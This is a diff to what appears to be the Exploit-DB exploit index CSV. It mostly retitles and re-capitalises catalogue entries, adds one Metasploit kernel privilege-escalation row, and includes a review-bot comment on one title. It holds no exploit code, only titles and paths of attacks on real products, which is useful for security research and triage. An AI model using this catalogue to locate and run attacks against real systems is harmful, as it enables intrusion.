 16191,platforms/windows/dos/16191.pl,"Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution",2011-02-18,"Francis Provencher",windows,dos,0
 16192,platforms/linux/dos/16192.pl,"Novell Iprint - LPD Remote Code Execution",2011-02-18,"Francis Provencher",linux,dos,0
@@ -14035,7 +14035,7 @@ id,file,description,date,author,platform,type,port
 16205,platforms/asp/webapps/16205.txt,"DIY Web CMS - Multiple Vulnerabilities",2011-02-22,p0pc0rn,asp,webapps,0
 16206,platforms/php/webapps/16206.txt,"Galilery 1.0 - Local File Inclusion",2011-02-22,lemlajt,php,webapps,0
 16207,platforms/php/webapps/16207.txt,"dotProject 2.1.5 - Multiple Vulnerabilities",2011-02-22,lemlajt,php,webapps,0
-16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp",2011-02-23,"Tavis Ormandy",linux,dos,0
+16216,platforms/linux/dos/16216.txt,"Red Hat Linux - stickiness of /tmp Exploit",2011-02-23,"Tavis Ormandy",linux,dos,0
 16208,platforms/ios/remote/16208.txt,"iOS FtpDisc 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
 16209,platforms/ios/remote/16209.txt,"iOS SideBooks 1.0 - Directory Traversal",2011-02-22,"R3d@l3rt_ Sp@2K_ Sunlight",ios,remote,0
 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0
@@ -14074,7 +14074,7 @@ id,file,description,date,author,platform,type,port
 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - '.cda' Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0
 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injections",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0
 16257,platforms/php/webapps/16257.txt,"SnapProof - 'page.php' SQL Injection",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0
-16259,platforms/windows/remote/16259.txt,"home ftp server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0
+16259,platforms/windows/remote/16259.txt,"Home FTP Server 1.12 - Directory Traversal",2011-02-28,clshack,windows,remote,0
 16260,platforms/windows/dos/16260.py,"Quick 'n Easy FTP Server 3.2 - Denial of Service",2011-02-28,clshack,windows,dos,0
 16261,platforms/multiple/dos/16261.txt,"PHP Exif Extension - 'exif_read_data()' Function Remote Denial of Service",2011-02-28,"_ikki and paradoxengine",multiple,dos,0
 16262,platforms/windows/dos/16262.c,"Microsoft Windows XP - WmiTraceMessageVa Integer Truncation PoC (MS11-011)",2011-03-01,"Nikita Tarakanov",windows,dos,0
@@ -14197,7 +14197,7 @@ id,file,description,date,author,platform,type,port
 16385,platforms/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
 16386,platforms/windows/remote/16386.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (2)",2010-07-03,Metasploit,windows,remote,0
 16387,platforms/hardware/remote/16387.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (2) (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
-16388,platforms/hardware/remote/16388.rb,"NetGear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
+16388,platforms/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,hardware,remote,0
 16389,platforms/windows/remote/16389.rb,"Omni-NFS Server - Buffer Overflow (Metasploit)",2010-11-11,Metasploit,windows,remote,0
 16390,platforms/windows/remote/16390.rb,"Energizer DUO Trojan Code - Execution (Metasploit)",2010-09-20,Metasploit,windows,remote,0
 16391,platforms/windows/remote/16391.rb,"EMC AlphaStor Agent - Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -14231,6 +14231,7 @@ id,file,description,date,author,platform,type,port
 16419,platforms/windows/remote/16419.rb,"Mercury/32 <= 4.01b - PH Server Module Buffer Overflow (Metasploit)",2010-06-15,Metasploit,windows,remote,0
 16420,platforms/windows/remote/16420.rb,"Firebird Relational Database - SVC_attach() Buffer Overflow (Metasploit)",2010-07-03,Metasploit,windows,remote,0
 16421,platforms/windows/remote/16421.rb,"IBM Tivoli Storage Manager Express CAD Service - Buffer Overflow (1)",2010-05-09,Metasploit,windows,remote,0
+40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
 16422,platforms/windows/remote/16422.rb,"mIRC 6.34 - PRIVMSG Handling Stack Buffer Overflow (Metasploit)",2010-06-22,Metasploit,windows,remote,0
 16423,platforms/windows/remote/16423.rb,"SAP Business One License Manager 2005 - Buffer Overflow (Metasploit)",2010-11-30,Metasploit,windows,remote,0
 16424,platforms/windows/remote/16424.rb,"Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,0
@@ -14584,7 +14585,7 @@ id,file,description,date,author,platform,type,port
 16772,platforms/windows/remote/16772.rb,"EFS Easy Chat Server - Authentication Request Handling Buffer Overflow (Metasploit)",2010-08-06,Metasploit,windows,remote,80
 16773,platforms/windows/remote/16773.rb,"Novell eDirectory NDS Server - Host Header Overflow (Metasploit)",2010-05-09,Metasploit,windows,remote,8028
 16774,platforms/windows/remote/16774.rb,"HP OpenView NNM 7.53/7.51 - OVAS.exe Unauthenticated Stack Buffer Overflow (Metasploit)",2010-10-12,Metasploit,windows,remote,0
-16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
+16775,platforms/windows/remote/16775.rb,"RhinoSoft Serv-U FTP Server - Session Cookie Buffer Overflow (Metasploit)",2010-03-10,Metasploit,windows,remote,0
 16776,platforms/windows/remote/16776.rb,"Alt-N WebAdmin - USER Buffer Overflow (Metasploit)",2010-02-15,Metasploit,windows,remote,0
 16777,platforms/windows/remote/16777.rb,"Free Download Manager - Remote Control Server Buffer Overflow (Metasploit)",2010-07-13,Metasploit,windows,remote,80
 16778,platforms/windows/remote/16778.rb,"Race River Integard Home/Pro - LoginAdmin Password Stack Buffer Overflow (Metasploit)",2010-12-15,Metasploit,windows,remote,18881
@@ -15091,7 +15092,7 @@ id,file,description,date,author,platform,type,port
 17351,platforms/hardware/dos/17351.py,"iPhone4 FTP Server 1.0 - Empty CWD-RETR Remote Crash",2011-05-31,offsetIntruder,hardware,dos,0
 17352,platforms/windows/remote/17352.rb,"7-Technologies IGSS 9 - Data Server/Collector Packet Handling Vulnerabilities (Metasploit)",2011-05-30,Metasploit,windows,remote,0
 17353,platforms/hardware/dos/17353.pl,"Brother HL-5370DW - series Authentication Bypass printer flooder",2011-05-31,chrisB,hardware,dos,0
-17354,platforms/windows/remote/17354.py,"Easy Ftp Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0
+17354,platforms/windows/remote/17354.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow",2011-06-01,b33f,windows,remote,0
 17355,platforms/windows/remote/17355.rb,"Golden FTP 4.70 - PASS Stack Buffer Overflow (Metasploit)",2011-06-02,Metasploit,windows,remote,21
 17356,platforms/hardware/remote/17356.txt,"MODACOM URoad-5000 1450 - Remote Command Execution/Backdoor",2011-06-02,"Alex Stanev",hardware,remote,0
 18716,platforms/windows/dos/18716.txt,"BulletProof FTP Client 2010 - Buffer Overflow",2012-04-08,Vulnerability-Lab,windows,dos,0
@@ -15118,7 +15119,7 @@ id,file,description,date,author,platform,type,port
 17382,platforms/windows/webapps/17382.txt,"Tele Data Contact Management Server - Directory Traversal",2011-06-10,"AutoSec Tools",windows,webapps,0
 17383,platforms/windows/local/17383.py,"The KMPlayer 3.0.0.1440 - '.mp3' Buffer Overflow (Windows 7 + ASLR Bypass)",2011-06-11,xsploitedsec,windows,local,0
 17456,platforms/windows/remote/17456.rb,"Citrix Provisioning Services 5.6 - streamprocess.exe Buffer Overflow (Metasploit)",2011-06-27,Metasploit,windows,remote,0
-17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 FTP Server - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
+17455,platforms/windows/dos/17455.rb,"SmallFTPd 1.0.3 - Denial of Service",2011-06-27,"Myo Soe",windows,dos,0
 17387,platforms/windows/dos/17387.html,"UUSEE ActiveX < 6.11.0412.1 - Buffer Overflow",2011-06-11,huimaozi,windows,dos,0
 17388,platforms/windows/webapps/17388.txt,"trend micro data loss prevention virtual Appliance 5.5 - Directory Traversal",2011-06-11,"White Hat Consultores",windows,webapps,0
 17389,platforms/php/webapps/17389.py,"Technote 7.2 - Blind SQL Injection",2011-06-11,BlueH4G,php,webapps,0
@@ -15223,7 +15224,7 @@ id,file,description,date,author,platform,type,port
 17503,platforms/jsp/webapps/17503.pl,"ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure",2011-07-07,@ygoltsev,jsp,webapps,0
 17507,platforms/hardware/remote/17507.py,"Avaya IP Office Manager TFTP Server 8.1 - Directory Traversal",2011-07-08,"SecPod Research",hardware,remote,0
 39661,platforms/windows/remote/39661.rb,"Easy File Sharing HTTP Server 7.2 - SEH Overflow (Metasploit)",2016-04-05,Metasploit,windows,remote,80
-39662,platforms/windows/remote/39662.rb,"PCMAN FTP Server Buffer Overflow - PUT Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21
+39662,platforms/windows/remote/39662.rb,"PCMan FTP Server Buffer Overflow - PUT Command (Metasploit)",2016-04-05,Metasploit,windows,remote,21
 17508,platforms/php/webapps/17508.txt,"appRain Quick Start Edition Core Edition Multiple 0.1.4-Alpha - Cross-Site Scripting Vulnerabilities",2011-07-08,"SecPod Research",php,webapps,0
 17510,platforms/php/webapps/17510.py,"phpMyAdmin3 (pma3) - Remote Code Execution",2011-07-08,wofeiwo,php,webapps,0
 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0
@@ -15239,7 +15240,7 @@ id,file,description,date,author,platform,type,port
 17523,platforms/php/webapps/17523.txt,"Tradingeye E-Commerce Shopping Cart - Multiple Vulnerabilities",2011-07-12,"$#4d0\/\/[r007k17]",php,webapps,0
 17524,platforms/php/webapps/17524.html,"Pandora Fms 3.2.1 - Cross-Site Request Forgery",2011-07-12,"mehdi boukazoula",php,webapps,0
 17525,platforms/php/webapps/17525.txt,"Joomla! Component Xmap 1.2.11 - Blind SQL Injection",2011-07-12,jdc,php,webapps,0
-17527,platforms/windows/remote/17527.py,"Solar FTP 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0
+17527,platforms/windows/remote/17527.py,"Solar FTP Server 2.1.1 - PASV Buffer Overflow (PoC)",2011-07-12,"Craig Freyman",windows,remote,0
 17528,platforms/php/webapps/17528.txt,"LiteRadius 3.2 - Multiple Blind SQL Injection",2011-07-13,"Robert Cooper",php,webapps,0
 17529,platforms/php/webapps/17529.txt,"TCExam 11.2.011 - Multiple SQL Injections",2011-07-13,LiquidWorm,php,webapps,0
 17530,platforms/php/webapps/17530.txt,"Joomla! Component SOBI2 2.9.3.2 - Blind SQL Injections",2011-07-14,jdc,php,webapps,0
@@ -15337,7 +15338,7 @@ id,file,description,date,author,platform,type,port
 17646,platforms/php/webapps/17646.txt,"Joomla! Component TNR Enhanced Joomla! Search - SQL Injection",2011-08-09,NoGe,php,webapps,0
 17647,platforms/windows/local/17647.rb,"A-PDF All to MP3 2.3.0 - Universal DEP Bypass",2011-08-10,"C4SS!0 G0M3S",windows,local,0
 17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0
-17649,platforms/windows/remote/17649.py,"BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
+17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
 17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (1)",2011-08-10,Metasploit,windows,remote,0
 17653,platforms/cgi/webapps/17653.txt,"Adobe RoboHelp 9 - DOM Cross-Site Scripting",2011-08-11,"Roberto Suggi Liverani",cgi,webapps,0
 17654,platforms/windows/local/17654.py,"MP3 CD Converter Professional 5.3.0 - Universal DEP Bypass",2011-08-11,"C4SS!0 G0M3S",windows,local,0
@@ -15372,7 +15373,7 @@ id,file,description,date,author,platform,type,port
 17688,platforms/php/webapps/17688.txt,"WordPress Plugin Allow PHP in Posts and Pages 2.0.0.RC1 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0
 17689,platforms/php/webapps/17689.txt,"WordPress Plugin Menu Creator 1.1.7 - SQL Injection",2011-08-18,"Miroslav Stampar",php,webapps,0
 17691,platforms/multiple/remote/17691.rb,"Apache Struts < 2.2.0 - Remote Command Execution (Metasploit)",2011-08-19,Metasploit,multiple,remote,0
-17692,platforms/windows/remote/17692.rb,"Solarftp 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote,0
+17692,platforms/windows/remote/17692.rb,"Solar FTP Server 2.1.2 - PASV Buffer Overflow (Metasploit)",2011-08-19,Qnix,windows,remote,0
 17695,platforms/php/webapps/17695.txt,"phpMyRealty 1.0.7 - SQL Injection",2011-08-19,H4T$A,php,webapps,0
 17694,platforms/php/webapps/17694.txt,"network tracker .95 - Persistent Cross-Site Scripting",2011-08-19,G13,php,webapps,0
 17696,platforms/multiple/dos/17696.pl,"Apache - Remote Denial of Service (Memory Exhaustion)",2011-08-19,kingcope,multiple,dos,0
@@ -15476,7 +15477,7 @@ id,file,description,date,author,platform,type,port
 17807,platforms/php/webapps/17807.txt,"OpenCart 1.5.1.2 - Blind SQL Injection",2011-09-08,"RiRes Walid",php,webapps,0
 17808,platforms/php/webapps/17808.txt,"WordPress Plugin WP-Filebase Download Manager 0.2.9 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0
 17809,platforms/php/webapps/17809.txt,"WordPress Plugin A to Z Category Listing 1.3 - SQL Injection",2011-09-09,"Miroslav Stampar",php,webapps,0
-17810,platforms/windows/remote/17810.rb,"BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0
+17810,platforms/windows/remote/17810.rb,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow (Metasploit)",2011-09-09,"SecPod Research",windows,remote,0
 17811,platforms/php/webapps/17811.txt,"MYRE Real Estate Software - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0
 17813,platforms/php/webapps/17813.txt,"Xataface WebAuction and Xataface Librarian DB - Multiple Vulnerabilities",2011-09-09,"SecPod Research",php,webapps,0
 17814,platforms/php/webapps/17814.txt,"WordPress Plugin Event Registration 5.44 - SQL Injection",2011-09-09,serk,php,webapps,0
@@ -15536,7 +15537,7 @@ id,file,description,date,author,platform,type,port
 17871,platforms/hardware/webapps/17871.txt,"Cisco TelePresence SOS-11-010 - Multiple Vulnerabilities",2011-09-19,"Sense of Security",hardware,webapps,0
 17872,platforms/php/webapps/17872.txt,"Multiple WordPress Plugins - timthumb.php File Upload",2011-09-19,"Ben Schmidt",php,webapps,0
 17873,platforms/windows/webapps/17873.txt,"SharePoint 2007/2010 and DotNetNuke < 6 - File Disclosure via XEE",2011-09-20,"Nicolas Gregoire",windows,webapps,0
-17874,platforms/hardware/webapps/17874.txt,"NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
+17874,platforms/hardware/webapps/17874.txt,"Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery",2011-09-20,"Sense of Security",hardware,webapps,0
 17876,platforms/windows/remote/17876.py,"ScriptFTP 3.3 - Remote Buffer Overflow (LIST) (1)",2011-09-20,modpr0be,windows,remote,0
 17877,platforms/windows/local/17877.py,"AVCon - DEP Bypass",2011-09-20,blake,windows,local,0
 17878,platforms/windows/dos/17878.txt,"EViews 7.0.0.1 - (aka 7.2) Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",windows,dos,0
@@ -15672,7 +15673,7 @@ id,file,description,date,author,platform,type,port
 18046,platforms/php/webapps/18046.txt,"Joomla! Component Barter Sites 1.3 - Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0
 18040,platforms/linux/local/18040.c,"Xorg 1.4 < 1.11.2 - File Permission Change (PoC)",2011-10-28,vladz,linux,local,0
 18027,platforms/windows/local/18027.rb,"Cytel Studio 9.0 - '.CY3' Stack Buffer Overflow (Metasploit)",2011-10-24,Metasploit,windows,local,0
-18028,platforms/windows/dos/18028.py,"zFTP Server - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0
+18028,platforms/windows/dos/18028.py,"zFTPServer - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0
 18029,platforms/windows/dos/18029.pl,"BlueZone - Malformed .zft file Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0
 18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0
 18031,platforms/php/webapps/18031.rb,"phpLDAPadmin 1.2.1.1 - (query_engine) Remote PHP Code Injection (2)",2011-10-25,Metasploit,php,webapps,0
@@ -15788,7 +15789,7 @@ id,file,description,date,author,platform,type,port
 18178,platforms/windows/local/18178.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow SEH Exploit '.m3u' (Metasploit)",2011-11-30,Rh0,windows,local,0
 18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0
-18182,platforms/windows/remote/18182.txt,"Serv-U FTP - Jail Break",2011-12-01,kingcope,windows,remote,0
+18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
 18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows (Metasploit)",2011-12-01,"Nick Freeman",windows,local,0
 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System - Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0
@@ -16013,11 +16014,11 @@ id,file,description,date,author,platform,type,port
 18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) - SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0
 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection",2012-02-06,chap0,php,webapps,0
 18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - Cross-Site Request Forgery",2012-02-07,"Vaibhav Gupta",php,webapps,0
-18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0
+18469,platforms/windows/dos/18469.pl,"TYPSoft FTP Server 1.10 - Multiple Commands Denial of Service",2012-02-07,"Balazs Makany",windows,dos,0
 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0
 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0
 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Inclusion",2012-02-08,Vulnerability-Lab,multiple,webapps,0
-18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD",2012-02-09,shinnai,windows,dos,0
+18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 - BSOD Exploit",2012-02-09,shinnai,windows,dos,0
 18476,platforms/windows/remote/18476.py,"Sysax Multi Server 5.52 - File Rename Buffer Overflow Remote Code Execution (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0
 18478,platforms/windows/remote/18478.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020000 Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0
 18479,platforms/windows/remote/18479.rb,"Adobe Flash Player - MP4 SequenceParameterSetNALUnit Buffer Overflow (Metasploit)",2012-02-10,Metasploit,windows,remote,0
@@ -16208,7 +16209,7 @@ id,file,description,date,author,platform,type,port
 18711,platforms/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0
 18714,platforms/windows/remote/18714.rb,"LANDesk Lenovo ThinkManagement Console - Remote Command Execution (Metasploit)",2012-04-08,Metasploit,windows,remote,0
 18715,platforms/multiple/webapps/18715.rb,"Liferay XSL - Command Execution (Metasploit)",2012-04-08,"Spencer McIntyre",multiple,webapps,0
-18718,platforms/windows/remote/18718.txt,"distinct tftp server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0
+18718,platforms/windows/remote/18718.txt,"Distinct TFTP Server 3.01 - Directory Traversal",2012-04-08,modpr0be,windows,remote,0
 18719,platforms/windows/dos/18719.pl,"Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service",2012-04-08,Death-Shadow-Dark,windows,dos,0
 18720,platforms/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,php,webapps,0
 18771,platforms/windows/dos/18771.txt,"SumatraPDF 2.0.1 - '.chm' / '.mobi' Memory Corruption",2012-04-23,shinnai,windows,dos,0
@@ -16308,7 +16309,7 @@ id,file,description,date,author,platform,type,port
 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
 18885,platforms/lin_x86/shellcode/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,lin_x86,shellcode,0
 18864,platforms/windows/dos/18864.txt,"QNX phrelay/phindows/phditto - Multiple Vulnerabilities",2012-05-11,"Luigi Auriemma",windows,dos,0
-18836,platforms/php/remote/18836.py,"PHP < 5.3.12 & < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
+18836,platforms/php/remote/18836.py,"PHP < 5.3.12 / < 5.4.2 - CGI Argument Injection",2012-05-05,rayh4c,php,remote,0
 18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router - Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0
 18840,platforms/asp/webapps/18840.txt,"Fortinet FortiWeb Web Application Firewall - Policy Bypass",2012-05-07,"Geffrey Velasquez",asp,webapps,0
 18841,platforms/cgi/webapps/18841.txt,"Lynx Message Server - Multiple Vulnerabilities",2012-05-07,"Mark Lachniet",cgi,webapps,0
@@ -16443,7 +16444,7 @@ id,file,description,date,author,platform,type,port
 19022,platforms/php/webapps/19022.txt,"WordPress Plugin TinyMCE Thumbnail Gallery 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0
 19023,platforms/php/webapps/19023.php,"WordPress Plugin wpStoreCart 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0
 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection",2012-06-08,"Easy Laster",php,webapps,0
-19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - DEBUG",1988-08-01,anonymous,linux,remote,0
+19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 - Debug exploit",1988-08-01,anonymous,linux,remote,0
 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x - SQL Injection",2012-06-10,"Easy Laster",php,webapps,0
 19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 / 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0
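Review bot: The new title for row 19028, `Berkeley Sendmail 5.58 - Debug exploit`, is cased differently from every other retitled row in this commit, which append a capitalised `Exploit` and keep the original token as written. The old value `DEBUG` appears to be the literal name of the Sendmail command, so lowercasing it makes the row harder to find for anyone searching the index by that keyword during triage. Following the quoting used elsewhere in this commit (`'pfdisplay.cgi' Exploit`, `'CFCRYPT.EXE' Exploit`), the description field would read `"Berkeley Sendmail 5.58 - 'DEBUG' Exploit"`.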
@@ -16452,15 +16453,15 @@ id,file,description,date,author,platform,type,port
 19037,platforms/windows/local/19037.rb,"Microsoft Office - ClickOnce Unsafe Object Package Handling (MS12-005)",2012-06-11,Metasploit,windows,local,0
 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 - Arbitrary PHP File Upload (Metasploit)",2012-06-10,Metasploit,php,webapps,0
 19039,platforms/bsd/remote/19039.txt,"BSD 4.2 fingerd - Buffer Overflow",1988-10-01,anonymous,bsd,remote,0
-19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc",1990-08-14,"Peter Shipley",solaris,remote,0
-19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot",1991-05-01,anonymous,aix,dos,0
-19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall",1999-11-23,anonymous,solaris,dos,0
-19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - /usr/release/bin/winstall",1999-11-12,anonymous,aix,dos,0
+19040,platforms/solaris/remote/19040.txt,"SunView (SunOS 4.1.1) - selection_svc Exploit",1990-08-14,"Peter Shipley",solaris,remote,0
+19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit",1991-05-01,anonymous,aix,dos,0
+19042,platforms/solaris/dos/19042.txt,"SunOS 4.1.1 - /usr/release/bin/makeinstall Exploit",1999-11-23,anonymous,solaris,dos,0
+19043,platforms/aix/dos/19043.txt,"SunOS 4.1.1 - /usr/release/bin/winstall Exploit",1999-11-12,anonymous,aix,dos,0
 19044,platforms/solaris/remote/19044.txt,"SunOS 4.1.3 - LD_LIBRARY_PATH and LD_OPTIONS",1992-05-27,anonymous,solaris,remote,0
-19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash",1993-02-03,anonymous,aix,dos,0
+19045,platforms/aix/dos/19045.txt,"SunOS 4.1.3 - kmem setgid /etc/crash Exploit",1993-02-03,anonymous,aix,dos,0
 19046,platforms/aix/dos/19046.txt,"AppleShare IP Mail Server 5.0.3 - Buffer Overflow",1999-10-15,"Chris Wedgwood",aix,dos,0
 19047,platforms/aix/remote/19047.txt,"Stalker Internet Mail Server 1.6 - Buffer Overflow",2001-09-12,"David Luyer",aix,remote,0
-19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - pfdisplay.cgi",1998-04-07,"J.A. Gutierrez",aix,remote,0
+19048,platforms/aix/remote/19048.txt,"IRIX 6.4 - 'pfdisplay.cgi' Exploit",1998-04-07,"J.A. Gutierrez",aix,remote,0
 19049,platforms/aix/dos/19049.txt,"BSDI 4.0 tcpmux / inetd - Crash",1998-04-07,"Mark Schaefer",aix,dos,0
 19050,platforms/php/webapps/19050.txt,"WordPress Plugin wp-gpx-map 1.1.21 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0
 19051,platforms/php/webapps/19051.txt,"ClanSuite 2.9 - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0
@@ -16473,8 +16474,8 @@ id,file,description,date,author,platform,type,port
 19058,platforms/php/webapps/19058.txt,"WordPress Plugin Custom Content Type Manager 0.9.5.13-pl - Arbitrary File Upload",2012-06-11,"Adrien Thierry",php,webapps,0
 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload",2012-06-11,Misa3l,php,webapps,0
 19060,platforms/php/webapps/19060.php,"TheBlog 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0
-19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE",1996-04-05,"Arthur Hagen",irix,local,0
-19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT",1996-11-22,"Yuri Volobuev",irix,local,0
+19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit",1996-04-05,"Arthur Hagen",irix,local,0
+19067,platforms/irix/local/19067.txt,"SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit",1996-11-22,"Yuri Volobuev",irix,local,0
 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP - Remote Root Authentication Bypass (1)",2012-06-11,"Florent Daigniere",hardware,dos,0
